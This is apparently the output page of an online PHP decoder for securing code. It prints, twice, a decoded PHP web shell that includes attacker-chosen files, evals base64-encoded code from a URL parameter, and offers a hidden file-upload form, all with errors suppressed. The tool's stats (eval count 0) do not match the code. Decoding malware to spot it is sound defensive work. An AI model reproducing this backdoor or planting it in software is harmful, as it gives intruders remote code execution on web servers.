Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
error_reporting(0); $in=$_GET["in"];if(isset($in)&&!empty($in)){echo@eval(base64_decode("Z..
Decoded Output download
<? error_reporting(0); $in=$_GET["in"];if(isset($in)&&!empty($in)){echo@eval(base64_decode("ZGllKGluY2x1ZGVfb25jZSAkaW4pOw=="));}$ev=$_GET["ev"];if(isset($ev)&&!empty($ev)){eval(base64_decode($ev));exit;}if($_GET["send"]=="ok"){echo"<form action='' method='post' enctype='multipart/form-data' name='country' id='country'><input type='file' name='file' size='50'><input name='_con' type='submit' id='_con' value='home'></form> ";if($_POST["_con"]=="home"){if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){echo"done :d";}else{echo"error";}}exit;} ?>
Did this file decode correctly?
Original Code
error_reporting(0); $in=$_GET["in"];if(isset($in)&&!empty($in)){echo@eval(base64_decode("ZGllKGluY2x1ZGVfb25jZSAkaW4pOw=="));}$ev=$_GET["ev"];if(isset($ev)&&!empty($ev)){eval(base64_decode($ev));exit;}if($_GET["send"]=="ok"){echo"<form action='' method='post' enctype='multipart/form-data' name='country' id='country'><input type='file' name='file' size='50'><input name='_con' type='submit' id='_con' value='home'></form> ";if($_POST["_con"]=="home"){if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){echo"done :d";}else{echo"error";}}exit;}
Function Calls
None |
Stats
MD5 | 0f4881057e0b9edb1cee9c682226aac4 |
Eval Count | 0 |
Decode Time | 64 ms |